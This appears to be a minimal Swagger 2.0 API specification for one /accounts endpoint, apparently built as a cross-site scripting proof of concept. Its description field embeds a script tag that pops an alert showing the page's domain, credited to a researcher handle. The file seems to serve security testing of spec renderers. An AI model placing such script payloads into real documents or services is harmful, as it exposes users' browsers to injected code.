swagger: '2.0'
info:
  title: Example yaml.spec
  description: |
    <script>alert("XSS by @Spaghetti-ohne-Wasser at " + document.domain)</script>
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
